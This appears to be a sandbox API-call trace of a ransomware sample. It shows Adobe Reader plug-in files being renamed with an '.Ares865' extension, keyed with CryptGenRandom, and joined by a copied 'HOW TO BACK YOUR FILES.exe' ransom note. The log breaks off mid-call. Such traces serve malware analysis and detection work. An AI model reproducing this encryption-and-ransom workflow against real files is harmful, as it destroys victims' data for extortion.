[0171.835] lstrcpyW (in: lpString1=0x2cce472, lpString2="Multimedia" | out: lpString1="Multimedia") returned="Multimedia" [0171.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0171.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9eb0 [0171.836] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0171.836] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d63ebe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x174c63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Multimedia.api", cAlternateFileName="MULTIM~1.API")) returned 1 [0171.836] lstrcmpiW (lpString1="Multimedia.api", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0171.836] lstrcmpiW (lpString1="Multimedia.api", lpString2="aoldtz.exe") returned 1 [0171.836] lstrcpyW (in: lpString1=0x2cce472, lpString2="Multimedia.api" | out: lpString1="Multimedia.api") returned="Multimedia.api" [0171.836] lstrlenW (lpString="Multimedia.api") returned 14 [0171.836] lstrlenW (lpString="Ares865") returned 7 [0171.836] lstrcmpiW (lpString1="dia.api", lpString2="Ares865") returned 1 [0171.836] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia.api.Ares865") returned 79 [0171.836] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia.api.ares865"), dwFlags=0x1) returned 1 [0171.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0171.840] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1526883) returned 1 [0171.840] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0171.841] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0171.841] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.915] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0171.916] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0171.916] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.936] lstrcpyW (in: lpString1=0x2cce472, lpString2="PDDom.api" | out: lpString1="PDDom.api") returned="PDDom.api" [0171.936] lstrlenW (lpString="PDDom.api") returned 9 [0171.936] lstrlenW (lpString="Ares865") returned 7 [0171.936] lstrcmpiW (lpString1="Dom.api", lpString2="Ares865") returned 1 [0171.936] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PDDom.api.Ares865") returned 74 [0171.936] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PDDom.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\pddom.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PDDom.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\pddom.api.ares865"), dwFlags=0x1) returned 1 [0171.948] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PDDom.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\pddom.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0171.951] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=430691) returned 1 [0171.954] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0171.962] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0171.962] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.980] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0171.981] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0171.981] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.987] lstrcpyW (in: lpString1=0x2cce472, lpString2="PPKLite.api" | out: lpString1="PPKLite.api") returned="PPKLite.api" [0171.987] lstrlenW (lpString="PPKLite.api") returned 11 [0171.987] lstrlenW (lpString="Ares865") returned 7 [0171.987] lstrcmpiW (lpString1="ite.api", lpString2="Ares865") returned 1 [0171.987] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PPKLite.api.Ares865") returned 76 [0171.987] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PPKLite.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ppklite.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PPKLite.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ppklite.api.ares865"), dwFlags=0x1) returned 1 [0171.990] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\PPKLite.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ppklite.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0171.990] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7598691) returned 1 [0171.990] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0171.991] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0171.991] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.287] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.288] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.288] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.308] lstrcpyW (in: lpString1=0x2cce472, lpString2="ReadOutLoud.api" | out: lpString1="ReadOutLoud.api") returned="ReadOutLoud.api" [0172.308] lstrlenW (lpString="ReadOutLoud.api") returned 15 [0172.308] lstrlenW (lpString="Ares865") returned 7 [0172.308] lstrcmpiW (lpString1="oud.api", lpString2="Ares865") returned 1 [0172.308] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\ReadOutLoud.api.Ares865") returned 80 [0172.308] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\ReadOutLoud.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\readoutloud.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\ReadOutLoud.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\readoutloud.api.ares865"), dwFlags=0x1) returned 1 [0172.312] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\ReadOutLoud.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\readoutloud.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.312] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=112227) returned 1 [0172.313] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.313] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.313] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.320] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.321] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.321] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.322] lstrcpyW (in: lpString1=0x2cce472, lpString2="reflow.api" | out: lpString1="reflow.api") returned="reflow.api" [0172.323] lstrlenW (lpString="reflow.api") returned 10 [0172.323] lstrlenW (lpString="Ares865") returned 7 [0172.323] lstrcmpiW (lpString1="low.api", lpString2="Ares865") returned 1 [0172.323] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api.Ares865") returned 75 [0172.323] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\reflow.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\reflow.api.ares865"), dwFlags=0x1) returned 1 [0172.325] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\reflow.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\reflow.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.325] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=347747) returned 1 [0172.326] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.326] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.326] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.344] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.344] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.344] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.349] lstrcpyW (in: lpString1=0x2cce472, lpString2="SaveAsRTF.api" | out: lpString1="SaveAsRTF.api") returned="SaveAsRTF.api" [0172.349] lstrlenW (lpString="SaveAsRTF.api") returned 13 [0172.349] lstrlenW (lpString="Ares865") returned 7 [0172.349] lstrcmpiW (lpString1="RTF.api", lpString2="Ares865") returned 1 [0172.350] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api.Ares865") returned 78 [0172.350] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\saveasrtf.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\saveasrtf.api.ares865"), dwFlags=0x1) returned 1 [0172.352] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SaveAsRTF.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\saveasrtf.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.352] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=406115) returned 1 [0172.352] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.353] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.353] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.370] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.371] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.371] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.377] lstrcpyW (in: lpString1=0x2cce472, lpString2="Search.api" | out: lpString1="Search.api") returned="Search.api" [0172.377] lstrlenW (lpString="Search.api") returned 10 [0172.377] lstrlenW (lpString="Ares865") returned 7 [0172.377] lstrcmpiW (lpString1="rch.api", lpString2="Ares865") returned 1 [0172.377] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api.Ares865") returned 75 [0172.377] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\search.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\search.api.ares865"), dwFlags=0x1) returned 1 [0172.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\search.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.379] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=430179) returned 1 [0172.379] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.380] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.380] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.407] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.407] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.407] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.413] lstrcpyW (in: lpString1=0x2cce472, lpString2="SendMail.api" | out: lpString1="SendMail.api") returned="SendMail.api" [0172.413] lstrlenW (lpString="SendMail.api") returned 12 [0172.413] lstrlenW (lpString="Ares865") returned 7 [0172.413] lstrcmpiW (lpString1="ail.api", lpString2="Ares865") returned -1 [0172.413] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api.Ares865") returned 77 [0172.413] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\sendmail.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\sendmail.api.ares865"), dwFlags=0x1) returned 1 [0172.416] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\sendmail.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.416] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=154723) returned 1 [0172.416] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.417] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.417] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.425] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.425] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.425] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.428] lstrcpyW (in: lpString1=0x2cce472, lpString2="Spelling.api" | out: lpString1="Spelling.api") returned="Spelling.api" [0172.428] lstrlenW (lpString="Spelling.api") returned 12 [0172.428] lstrlenW (lpString="Ares865") returned 7 [0172.428] lstrcmpiW (lpString1="ing.api", lpString2="Ares865") returned 1 [0172.428] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api.Ares865") returned 77 [0172.428] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\spelling.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\spelling.api.ares865"), dwFlags=0x1) returned 1 [0172.431] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\spelling.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=277091) returned 1 [0172.431] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.432] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.432] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.456] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.457] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.457] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.461] lstrcpyW (in: lpString1=0x2cce472, lpString2="Updater.api" | out: lpString1="Updater.api") returned="Updater.api" [0172.461] lstrlenW (lpString="Updater.api") returned 11 [0172.461] lstrlenW (lpString="Ares865") returned 7 [0172.461] lstrcmpiW (lpString1="ter.api", lpString2="Ares865") returned 1 [0172.461] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api.Ares865") returned 76 [0172.461] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\updater.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\updater.api.ares865"), dwFlags=0x1) returned 1 [0172.464] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\updater.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.464] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=169059) returned 1 [0172.464] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.465] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.465] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.485] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.486] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.486] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.488] lstrcpyW (in: lpString1=0x2cce472, lpString2="weblink.api" | out: lpString1="weblink.api") returned="weblink.api" [0172.488] lstrlenW (lpString="weblink.api") returned 11 [0172.488] lstrlenW (lpString="Ares865") returned 7 [0172.489] lstrcmpiW (lpString1="ink.api", lpString2="Ares865") returned 1 [0172.489] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api.Ares865") returned 76 [0172.489] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\weblink.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\weblink.api.ares865"), dwFlags=0x1) returned 1 [0172.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\weblink.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\weblink.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.492] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=306275) returned 1 [0172.492] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.493] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.493] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.510] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.511] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.511] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.527] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia" [0172.527] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia" [0172.527] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.527] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 